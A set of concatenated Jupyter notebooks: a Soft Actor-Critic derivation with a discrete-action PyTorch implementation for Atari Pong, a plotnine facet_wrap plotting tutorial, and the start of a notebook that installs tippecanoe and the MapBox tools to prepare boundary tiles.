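###Output
_____no_output_____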
algorithm_implement/soft_actor_critic/soft_actor_critic(SAC)_discrete_image.ipynb
###Markdown
Algorithm Soft Actor-Critic
FROM PAPER
***
**Input:** $\theta_1, \theta_2, \phi$
&nbsp;&nbsp;&nbsp;&nbsp;$\bar{\theta}_1\leftarrow \theta_1 ,\bar{\theta}_2\leftarrow \theta_2$
&nbsp;&nbsp;&nbsp;&nbsp;$D \leftarrow \varnothing$
&nbsp;&nbsp;&nbsp;&nbsp;**for** each iteration **do**
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**for** each environment step **do**
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$a_t \sim \pi_\phi(a_t|s_t)$
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$s_{t+1}\sim p(s_{t+1}|s_t, a_t)$
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$D \leftarrow D\cup\{(s_t,a_t,r(s_t,a_t),s_{t+1})\}$
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**end for**
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**for** each gradient step **do**
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\theta_i\leftarrow\theta_i - \lambda_Q\hat{\nabla}_{\theta_i}J_Q(\theta_i)$&nbsp;&nbsp;for $i\in \{1,2\}$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Update the Q-function parameters
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\phi \leftarrow \phi - \lambda_\pi\hat{\nabla}_\phi J_\pi(\phi)$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Update policy weights
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\alpha\leftarrow \alpha - \lambda\hat{\nabla}_\alpha J(\alpha)$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Adjust temperature
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\bar{\theta}_i\leftarrow \tau\theta_i+(1-\tau)\bar{\theta}_i$&nbsp; for $i\in \{1,2\}$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Update target network weights
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**end for**
&nbsp;&nbsp;&nbsp;&nbsp;**end for**
**Output:**&nbsp;$\theta_1,\theta_2,\phi$

Main formulas:
1. Soft Bellman residual:
$$J_Q(\theta)=\mathbb{E}_{(s_t,a_t)\sim D}\big[\frac{1}{2}(Q_\theta(s_t,a_t)-{\cal{T}}^\pi Q(s_t,a_t))^2\big]\tag{1}$$
Soft Q-value function:
$${\cal{T}}^\pi Q(s_t,a_t) \triangleq r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim p}[V_\bar{\theta}(s_{t+1})]\tag{2}$$
Soft state value function:
$$V(s_t) = \mathbb{E}_{a_t\sim \pi}[Q(s_t,a_t)-\alpha\log\pi(a_t|s_t)]\tag{3}$$
From these, the gradient of the soft Bellman residual follows:
$$\hat{\nabla}_\theta J_Q(\theta)=\nabla_\theta Q_\theta(a_t,s_t)(Q_\theta(s_t,a_t)-(r(s_t,a_t)+\gamma(Q_{\bar{\theta}}(s_{t+1},a_{t+1})-\alpha\log(\pi_\phi(a_{t+1}|s_{t+1}))))\tag{4}$$
2. Policy loss:
$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D}\big[\mathbb{E}_{a_t\sim \pi_\phi}[Q_\phi(s_t,a_t)-\alpha\log(\pi_\phi(a_t|s_t))]\big]\tag{5}$$
Since
$$a_t=f_\phi(\epsilon_t;s_t),\tag{6}$$
this can be rewritten as:
$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D,\;\epsilon_t\sim N}[Q_\theta(s_t,f_\phi(\epsilon_t;s_t))-\alpha\log\pi_\phi(f_\phi(\epsilon_t;s_t)|s_t)]\tag{7}$$
so its gradient takes the form:
$$\hat{\nabla}_\phi J_\pi(\phi)=\nabla_\phi\alpha\log(\pi_\phi(a_t|s_t))+\big(\nabla_{a_t}\alpha\log(\pi_\phi(a_t|s_t))-\nabla_{a_t}Q(s_t,a_t)\big)\nabla_\phi f_\phi(\epsilon_t;s_t)\tag{8}$$
3. Adaptive temperature $\alpha$ (the paper says $\alpha$, $Q$ and $\pi$ form a dual problem; I don't fully follow this point):
$$\alpha^*_t=\arg {\min_{\alpha_t}}\mathbb{E}_{a_t\sim\pi^*_t}[-\alpha_t\log\pi^*_t(a_t|s_t;\alpha_t)-\alpha_t\bar{H}]\tag{9}$$
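In the discrete-action case the expectations in Eqs. (1)-(3) can be computed exactly as sums over actions. A minimal PyTorch sketch of the resulting soft Bellman target follows; `soft_q_target` and the `actor` / `target_q1` / `target_q2` call signatures are illustrative assumptions, not code from the paper or from the implementation below.
###Code
import torch

def soft_q_target(reward, done, next_state, actor, target_q1, target_q2, alpha, gamma=0.99):
    # Target of Eq. (1): r + gamma * V(s_{t+1}), with V from Eq. (3)
    with torch.no_grad():                               # the target carries no gradient
        next_probs = actor(next_state)                  # pi(.|s_{t+1}), shape [batch, n_actions]
        next_log_probs = torch.log(next_probs + 1e-8)
        # Clipped double-Q: elementwise min of the two target critics
        q_next = torch.min(target_q1(next_state), target_q2(next_state))
        # Eq. (3): V(s) = E_a[Q(s,a) - alpha * log pi(a|s)], taken as an exact sum over actions
        v_next = (next_probs * (q_next - alpha * next_log_probs)).sum(dim=1, keepdim=True)
        # Eq. (2): soft Bellman backup, masking out terminal states
        return reward + gamma * (1.0 - done) * v_next
###Output
_____no_output_____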
Adaptive temperature $\alpha$ (the paper derives this by treating the $\alpha$ update as the dual of a constrained optimization over $Q$ and $\pi$):$$\alpha^*_t=\arg {\min_{\alpha_t}}\mathbb{E}_{a_t\sim\pi^*_t}[-\alpha_t\log\pi^*_t(a_t|s_t)-\alpha_t\bar{H}]\tag{9}$$ Formula Proofs1. Proof of formulas $(2)$ and $(3)$: Starting from the first action transition, the soft reward obtained for the action taken at each state can be defined as:$$r_{soft}(s_t,a_t)=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim \rho}H(\pi(\cdot|s_{t+1}))\tag{10}$$Substituting this into the original Q-function $Q(s_t,a_t)=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q(s_{t+1},a_{t+1})]$ gives:$$\begin{aligned}Q_{soft}(s_t,a_t)&=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q_{soft}(s_{t+1},a_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\mathbb{E}_{s_{t+1}\sim\rho}\mathbb{E}_{a_{t+1}\sim\pi}[-\alpha\log\pi(a_{t+1}|s_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho}[\mathbb{E}_{a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})-\alpha\log(\pi(a_{t+1}|s_{t+1}))]]\end{aligned}\tag{11}$$2. Background for the policy loss: [relative entropy (KL divergence)](https://blog.csdn.net/tsyccnh/article/details/79163834). For two probability distributions P(x) and Q(x) over the same random variable x, it measures how far apart the distributions are:$$D_{KL}(p||q)=\sum_{i=1}^n p(x_i)\log[\frac{p(x_i)}{q(x_i)}]$$The closer $D_{KL}$ is to 0, the closer the distributions $p,q$ are. Expanding:$$\begin{aligned}D_{KL}(p||q)&=\sum_{i=1}^np(x_i)\log(p(x_i))-\sum^n_{i=1}p(x_i)\log(q(x_i)) \\&=\underbrace{-H(p(x))}_{\text{entropy}}+\underbrace{[-\sum^n_{i=1}p(x_i)\log(q(x_i))]}_{\text{cross-entropy}}\end{aligned}$$In a classification problem, where the label distribution is p, the first part is constant, so only the second part — the **cross-entropy** — needs to be computed. LandscapeAfter all this lofty theory, the idea is simply that both the actor and the critic account for entropy when computing their losses, which encourages exploration. Since the critic guides the actor, it too has to keep "encourage exploration" in mind — otherwise how could it judge the actor's actions? Note also that the deterministic version of SAC has no entropy term: a deterministic policy provides no source of entropy (which is why deterministic SAC may actually perform worse than TD3). Entropy requires a proper distribution (e.g. a normal distribution in the continuous case), so switching to a discrete action space is only a few lines of code. Implementation Tips1. Use torch.no_grad() rather than .detach() — it is more explicit. The five EDITs relative to (continuous) SAC1. Change the Critic network to take the state as input and output one Q-value per action2. Change the Actor network to a softmax output3. Change the Critic update to compute Q by gathering according to the Actor's sampled action4. Update alpha by gathering the sampled action's log-probability from the Actor (an exact-expectation alternative is sketched after the training loop below)5. 
The Actor update is weighted by each action's probability, which minimizes the variance of the gradient estimate ---The Atari environments are very sensitive to the learning rate: 1e-3 vs. 1e-4 makes a huge difference---Adding nn.BatchNorm2d(32) does not speed up learning ###Code import torch import torch.nn as nn import torch.optim as optim from torch.distributions import Categorical import torch.nn.functional as F from torch.utils.tensorboard import SummaryWriter import gym import random import numpy as np from itertools import count import matplotlib.pyplot as plt from collections import namedtuple, deque import time import os import sys sys.path.append('../') from utils.wrappers import make_atari, wrap_deepmind, wrap_pytorch %matplotlib inline device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') class ReplayBuffer: def __init__(self, state_dims, buffer_size, batch_size): self.state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32) self.action = np.zeros(buffer_size, dtype=np.float32) self.next_state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32) self.reward = np.zeros(buffer_size, dtype=np.float32) self.done = np.zeros(buffer_size, dtype=np.float32) self.batch_size = batch_size self.buffer_size = buffer_size self.size, self.current_index = 0, 0 def store(self, state, action, next_state, reward, done): self.state[self.current_index] = state self.action[self.current_index] = action self.next_state[self.current_index] = next_state self.reward[self.current_index] = reward self.done[self.current_index] = done self.current_index = (self.current_index + 1) % self.buffer_size self.size = min((self.size + 1), self.buffer_size) def sample(self): idx = np.random.choice(self.size, self.batch_size) return dict(state = torch.FloatTensor(self.state[idx]).to(device), action = torch.LongTensor(self.action[idx]).unsqueeze(1).to(device), next_state = torch.FloatTensor(self.next_state[idx]).to(device), reward = torch.FloatTensor(self.reward[idx]).unsqueeze(1).to(device), done = torch.FloatTensor(self.done[idx]).unsqueeze(1).to(device)) def __len__(self): return self.size def weights_init_(m): if isinstance(m, nn.Linear): # Xavier/Glorot uniform: uses std = gain * sqrt(2 / (fan_in + fan_out)) # in place of the std of a Gaussian N(0, std^2) torch.nn.init.xavier_uniform_(m.weight, gain=1) if m.bias is not None: torch.nn.init.constant_(m.bias, 0) # self.common_layer = nn.Sequential( # nn.Conv2d(state_dims[0], 32, kernel_size=5, stride=1, padding=2), # nn.MaxPool2d(2), # nn.ReLU(), # nn.Conv2d(32, 32, kernel_size=5, stride=1, padding=1), # nn.MaxPool2d(2), # nn.ReLU(), # nn.Conv2d(32, 64, kernel_size=4, stride=1, padding=1), # nn.MaxPool2d(2), # nn.ReLU(), # nn.Conv2d(64, 64, kernel_size=3, stride=1), # nn.MaxPool2d(2), # nn.ReLU() # ) # EDIT 1 class Critic(nn.Module): def __init__(self, state_dims, action_dim, hidden_dim=512): super(Critic, self).__init__() self.common_layer = nn.Sequential( nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4), nn.BatchNorm2d(32), nn.ReLU(), nn.Conv2d(32, 64, kernel_size=4, stride=2), nn.BatchNorm2d(64), nn.ReLU(), nn.Conv2d(64, 64, kernel_size=3, stride=1), nn.BatchNorm2d(64), nn.ReLU() ) self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim) self.linear2 = nn.Linear(hidden_dim, action_dim) self.apply(weights_init_) def forward(self, state): common = self.common_layer(state) common = common.view(common.size(0), -1) linear = F.relu(self.linear1(common)) value = self.linear2(linear) return value # EDIT 2 class Actor(nn.Module): def __init__(self, state_dims, action_dim, hidden_dim=512): super(Actor, self).__init__() self.common_layer = nn.Sequential( 
nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4), nn.BatchNorm2d(32), nn.ReLU(), nn.Conv2d(32, 64, kernel_size=4, stride=2), nn.BatchNorm2d(64), nn.ReLU(), nn.Conv2d(64, 64, kernel_size=3, stride=1), nn.BatchNorm2d(64), nn.ReLU() ) self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim) self.linear2 = nn.Linear(hidden_dim, action_dim) self.apply(weights_init_) def forward(self, state): common = self.common_layer(state) common = common.view(common.size(0), -1) linear = F.relu(self.linear1(common)) action_probs = F.softmax(self.linear2(linear), dim=1) max_action_prob = torch.argmax(action_probs, dim=1) # (unused) dist = Categorical(action_probs) action = dist.sample() action_log_prob = dist.logits # normalized log-probabilities over all actions return action.unsqueeze(1), action_probs, action_log_prob def take_action(state, timesteps): if start_steps > timesteps: action = env.action_space.sample() else: state = torch.FloatTensor(state).unsqueeze(0).to(device) with torch.no_grad(): action, _, _ = actor(state) action = action.item() return action ## hyperparameters env_name = "PongNoFrameskip-v4" start_steps = 10000 # env_name = "Breakout-v0" # start_steps = 500 env = make_atari(env_name) env = wrap_deepmind(env) env = wrap_pytorch(env) algorithm_id = "soft_actor_critic_discrete_image" buffer_size = int(1e6) batch_size = 64 episodes = 10000 learning_rate = 1e-5 gamma = 0.99 soft_tau = 5e-3 actor_update = 2 automatic_entropy_tuning = True ## hyperparameters current_time = time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(time.time())) ROOT_DIR = "../running_log/{}/{}/{}".format(algorithm_id, env_name, current_time) model_dir = os.path.join(ROOT_DIR, "model") plot_dir = os.path.join(ROOT_DIR, "tensorboard") os.makedirs(model_dir) os.makedirs(plot_dir) writer = SummaryWriter(plot_dir, comment="learning_rate={}-batch_size={}-start_steps={}" .format(learning_rate , batch_size, start_steps)) # env = gym.make(env_name) # state_dim = env.observation_space.shape[0] state_dims = env.observation_space.shape action_dim = env.action_space.n critic_1 = Critic(state_dims, action_dim).to(device) critic_2 = Critic(state_dims, action_dim).to(device) target_critic_1 = Critic(state_dims, action_dim).to(device) target_critic_2 = Critic(state_dims, action_dim).to(device) actor = Actor(state_dims, action_dim).to(device) target_critic_1.load_state_dict(critic_1.state_dict()) target_critic_2.load_state_dict(critic_2.state_dict()) critic_optimizer_1 = optim.Adam(critic_1.parameters(), lr=learning_rate) critic_optimizer_2 = optim.Adam(critic_2.parameters(), lr=learning_rate) actor_optimizer = optim.Adam(actor.parameters(), lr=learning_rate) buffer = ReplayBuffer(state_dims, buffer_size, batch_size) # torch.prod() returns the product of all elements in the input tensor (optionally along a given dimension) if automatic_entropy_tuning: # target_entropy = - torch.prod(torch.Tensor(env.action_space.shape).to(device)).item() # -4.0 target_entropy = - 1.0 log_alpha = torch.zeros(1, requires_grad=True, device=device) # tensor([0.], device='cuda:0', requires_grad=True) alpha = log_alpha.exp() alpha_optim = optim.Adam([log_alpha], lr=learning_rate) def sac_train(updates, steps_): global alpha for i in range(steps_): samples = buffer.sample() state, action, next_state = samples["state"], samples["action"], samples["next_state"] reward, done = samples["reward"], samples["done"] # update critic with torch.no_grad(): # EDIT 3 next_action, _, next_action_log_probs = actor(next_state) next_action_log_probs = next_action_log_probs.gather(1, next_action.long()) target_Q_1 = 
target_critic_1(next_state).gather(1, next_action.long()) target_Q_2 = target_critic_2(next_state).gather(1, next_action.long()) Q_target_next = torch.min(target_Q_1, target_Q_2) - alpha * next_action_log_probs next_q_value = reward + (1.0 - done) * gamma * Q_target_next Q_1 = critic_1(state).gather(1, action) Q_2 = critic_2(state).gather(1, action) critic_loss_1 = F.mse_loss(next_q_value, Q_1) critic_loss_2 = F.mse_loss(next_q_value, Q_2) critic_optimizer_1.zero_grad() critic_loss_1.backward() critic_optimizer_1.step() critic_optimizer_2.zero_grad() critic_loss_2.backward() critic_optimizer_2.step() # update actor # EDIT 5 if i % actor_update == 0: actions, action_probs, action_log_probs = actor(state) min_Q_value = torch.min(critic_1(state), critic_2(state)) actor_loss = (alpha * action_log_probs - min_Q_value) * action_probs actor_loss = torch.sum(actor_loss, dim=1, keepdim=True).mean() actor_optimizer.zero_grad() actor_loss.backward() actor_optimizer.step() # update entropy_tuning if automatic_entropy_tuning: # EDIT 4 action_log_probs = action_log_probs.gather(1, actions.long()) alpha_loss = - log_alpha * (action_log_probs.detach() + target_entropy) alpha_loss = alpha_loss.mean() alpha_optim.zero_grad() alpha_loss.backward() alpha_optim.step() alpha = log_alpha.exp() # update parameter for target_param, param in zip(target_critic_1.parameters(), critic_1.parameters()): target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau) for target_param, param in zip(target_critic_2.parameters(), critic_2.parameters()): target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau) writer.add_scalars("Loss/Critic", {"critic_1":critic_loss_1, "critic_2":critic_loss_2}, updates) writer.add_scalar("Loss/Actor", actor_loss, updates) writer.add_scalar("Loss/Alpha", alpha_loss, updates) updates, timesteps, done_time = 0, 0, 0 for episode in range(episodes): state = env.reset() episode_reward = 0 for i in count(): timesteps += 1 action = take_action(state, timesteps) next_state, reward, done, _ = env.step(action) buffer.store(state, action, next_state, reward, done) state = next_state episode_reward += reward if done: if len(buffer) > batch_size: sac_train(updates, i+1) updates += 1 writer.add_scalar("Episode_step", i, done_time) done_time += 1 break writer.add_scalar("Reward", episode_reward, episode) torch.save(actor, model_dir + "/actor_model.pth") ###Output _____no_output_____
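###Markdown EDIT 4 above estimates the temperature loss from the one sampled action. Because the policy is discrete, the same expectation can instead be taken exactly over all actions, which lowers the variance of the $\alpha$ update. This is only a sketch of that alternative, not what was run above — it reuses `actor`, `log_alpha` and `target_entropy` from this notebook: ###Code # Hypothetical variant: alpha loss as an exact expectation over the discrete actions def alpha_loss_expectation(state): _, action_probs, action_log_probs = actor(state) # weight each action's term by its probability instead of gathering one sample per_action = -log_alpha * (action_log_probs.detach() + target_entropy) return (action_probs.detach() * per_action).sum(dim=1).mean() ###Output _____no_output_____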
demo_plot/plotnine-examples/examples/facet_wrap.ipynb
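###Markdown Setup: this walkthrough assumes plotnine and its bundled `mpg` dataset are available. A minimal import cell consistent with the calls below (an assumption — the original setup cell is not shown in this excerpt): ###Code from plotnine import ggplot, aes, geom_point, facet_wrap, labs, theme from plotnine.data import mpg ###Output _____no_output_____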
###Markdown Facet wrap`facet_wrap()` creates a collection of plots (facets), where each plot is differentiated by the faceting variable. These plots are wrapped into a certain number of columns or rows as specified by the user. ###Code mpg.head() ###Output _____no_output_____ ###Markdown Basic scatter plot: ###Code ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____ ###Markdown Facet a discrete variable using `facet_wrap()`: ###Code ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class') + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____ ###Markdown Control the number of rows and columns with the options `nrow` and `ncol`: ###Code # Selecting the number of columns to display ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class', ncol = 4 # change the number of columns ) + labs(x='displacement', y='highway mpg') ) # Selecting the number of rows to display ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class', nrow = 4 # change the number of rows ) + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____ ###Markdown To change the plot order of the facets, reorder the levels of the faceting variable in the data. ###Code # re-order categories mpg['class'] = mpg['class'].cat.reorder_categories(['pickup', 'suv','minivan','midsize','compact','subcompact','2seater']) # facet plot with reordered class category ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class') + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____ ###Markdown Ordinarily the facets are arranged horizontally (left-to-right from top to bottom). However if you would prefer a vertical layout (facets are arranged top-to-bottom, from left to right) use the `dir` option: ###Code # Facet plot with vertical layout ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class' , dir = 'v' # change to a vertical layout ) + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____ ###Markdown You can choose whether the scales of the x- and y-axes are fixed or free. Set the `scales` argument to `free_y`, `free_x` or `free` for free scales on the y-axis, x-axis or both axes respectively. You may need to add spacing between the facets to ensure axis ticks and values are easy to read. A fixed scale is the default and does not need to be specified. ###Code # facet plot with free scales ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class' , scales = 'free_y' # set scales so y-scale varies with the data ) + theme(subplots_adjust={'wspace': 0.25}) # add spacing between facets to make y-axis ticks visible + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____ ###Markdown You can add additional information to your facet labels by using the `labeller` argument within the `facet_wrap()` command. Below we use `labeller = 'label_both'` to include the column name in the facet label. 
###Code # facet plot with labeller ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class', labeller = 'label_both') + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____ ###Markdown You can add two discrete variables to a facet: ###Code # add additional column for plotting exercise mpg["transmission"] = mpg['trans'].map(lambda x: "auto" if "auto" in x else "man" if "man" in x else "") # inspect new column transmission which identifies cars as having an automatic or manual transmission mpg.head() # facet plot with two variables on one facet ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('~ class + transmission') # use ~ + to add additional faceting variables + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____
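###Markdown When you want a full row-by-column cross of two variables, `facet_grid` can read better than `facet_wrap`. A brief sketch (assuming `facet_grid` is also imported from plotnine): ###Code from plotnine import facet_grid # facet rows by transmission and columns by class ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_grid('transmission ~ class') + labs(x='displacement', y='highway mpg') ) ###Output _____no_output_____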
prepare_boundaries_for_mapbox.ipynb
###Markdown Prepare data for the Soils Revealed projecthttps://github.com/Vizzuality/soils-revealed-data`Edward P. Morris (vizzuality.)` DescriptionThis notebook transforms vector boundaries into MapBox tiles format (MBTILES) using tippecanoe and uploads the resulting tiles to MapBox.```MIT LicenseCopyright (c) 2020 VizzualityPermission is hereby granted, free of charge, to any person obtaining a copyof this software and associated documentation files (the "Software"), to dealin the Software without restriction, including without limitation the rightsto use, copy, modify, merge, publish, distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software isfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in allcopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THEAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHERLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THESOFTWARE.``` Setup Linux dependencies ###Code %%bash # Install AWS CLI (for MapBox uploads) apt install --no-install-recommends -y -q awscli %%bash # Install tippecanoe (for MapBox mbtiles) apt install --no-install-recommends -q -y build-essential libsqlite3-dev zlib1g-dev add-apt-repository -y ppa:ubuntu-toolchain-r/test apt update -q -y apt install --no-install-recommends -q -y g++-5 export CXX=g++-5 git clone https://github.com/mapbox/tippecanoe.git cd tippecanoe make -j make install !tippecanoe -h ###Output tippecanoe: invalid option -- 'h' Usage: tippecanoe [options] [file.json ...] Output tileset --output=output.mbtiles [--output-to-directory=...] [--force] [--allow-existing] Tileset description and attribution [--name=...] [--attribution=...] [--description=...] Input files and layer names [--layer=...] [--named-layer=...] Parallel processing of input [--read-parallel] Projection of input [--projection=...] Zoom levels [--maximum-zoom=...] [--minimum-zoom=...] [--extend-zooms-if-still-dropping] [--one-tile=...] Tile resolution [--full-detail=...] [--low-detail=...] [--minimum-detail=...] Filtering feature attributes [--exclude=...] [--include=...] [--exclude-all] Modifying feature attributes [--attribute-type=...] [--attribute-description=...] [--accumulate-attribute=...] [--empty-csv-columns-are-null] [--convert-stringified-ids-to-numbers] [--use-attribute-for-id=...] Filtering features by attributes [--feature-filter-file=...] [--feature-filter=...] Dropping a fixed fraction of features by zoom level [--drop-rate=...] [--base-zoom=...] [--drop-lines] [--drop-polygons] [--cluster-distance=...] Dropping or merging a fraction of features to keep under tile size limits [--drop-densest-as-needed] [--drop-fraction-as-needed] [--drop-smallest-as-needed] [--coalesce-densest-as-needed] [--coalesce-fraction-as-needed] [--coalesce-smallest-as-needed] [--force-feature-limit] [--cluster-densest-as-needed] Dropping tightly overlapping features [--gamma=...] [--increase-gamma-as-needed] Line and polygon simplification [--simplification=...] 
[--no-line-simplification] [--simplify-only-low-zooms] [--no-tiny-polygon-reduction] [--no-simplification-of-shared-nodes] Attempts to improve shared polygon boundaries [--detect-shared-borders] [--grid-low-zooms] Controlling clipping to tile boundaries [--buffer=...] [--no-clipping] [--no-duplication] Reordering features within each tile [--preserve-input-order] [--reorder] [--coalesce] [--reverse] [--hilbert] Adding calculated attributes [--calculate-feature-density] [--generate-ids] Trying to correct bad source geometry [--detect-longitude-wraparound] [--use-source-polygon-winding] [--reverse-source-polygon-winding] [--clip-bounding-box=...] Filtering tile contents [--prefilter=...] [--postfilter=...] Setting or disabling tile size limits [--maximum-tile-bytes=...] [--maximum-tile-features=...] [--no-feature-limit] [--no-tile-size-limit] [--no-tile-compression] [--no-tile-stats] [--tile-stats-attributes-limit=...] [--tile-stats-sample-values-limit=...] [--tile-stats-values-limit=...] Temporary storage [--temporary-directory=...] Progress indicator [--quiet] [--no-progress-indicator] [--progress-interval=...] [--version] ###Markdown Python packages ###Code %%bash # Install mapbox python package pip install mapbox !pip list ###Output Package Version ------------------------ --------------- absl-py 0.9.0 alabaster 0.7.12 albumentations 0.1.12 altair 4.1.0 asgiref 3.2.7 astor 0.8.1 astropy 4.0.1.post1 astunparse 1.6.3 atari-py 0.2.6 atomicwrites 1.3.0 attrs 19.3.0 audioread 2.1.8 autograd 1.3 awscli 1.14.44 Babel 2.8.0 backcall 0.1.0 beautifulsoup4 4.6.3 bleach 3.1.4 blis 0.4.1 bokeh 1.4.0 boto 2.49.0 boto3 1.12.39 botocore 1.15.39 Bottleneck 1.3.2 branca 0.4.0 bs4 0.0.1 CacheControl 0.12.6 cachetools 3.1.1 catalogue 1.0.0 certifi 2020.4.5.1 cffi 1.14.0 chainer 6.5.0 chardet 3.0.4 click 7.1.1 cloudpickle 1.3.0 cmake 3.12.0 cmdstanpy 0.4.0 colorama 0.3.7 colorlover 0.3.0 community 1.0.0b1 contextlib2 0.5.5 convertdate 2.2.0 coverage 3.7.1 coveralls 0.5 crcmod 1.7 cufflinks 0.17.3 cvxopt 1.2.4 cvxpy 1.0.31 cycler 0.10.0 cymem 2.0.3 Cython 0.29.16 daft 0.0.4 dask 2.12.0 dataclasses 0.7 datascience 0.10.6 decorator 4.4.2 defusedxml 0.6.0 descartes 1.1.0 dill 0.3.1.1 distributed 1.25.3 Django 3.0.5 dlib 19.18.0 docopt 0.6.2 docutils 0.15.2 dopamine-rl 1.0.5 earthengine-api 0.1.217 easydict 1.9 ecos 2.0.7.post1 editdistance 0.5.3 en-core-web-sm 2.2.5 entrypoints 0.3 ephem 3.7.7.1 et-xmlfile 1.0.1 fa2 0.3.5 fancyimpute 0.4.3 fastai 1.0.60 fastdtw 0.3.4 fastprogress 0.2.3 fastrlock 0.4 fbprophet 0.6 feather-format 0.4.0 featuretools 0.4.1 filelock 3.0.12 firebase-admin 4.0.1 fix-yahoo-finance 0.0.22 Flask 1.1.2 folium 0.8.3 fsspec 0.7.2 future 0.16.0 gast 0.3.3 GDAL 2.2.2 gdown 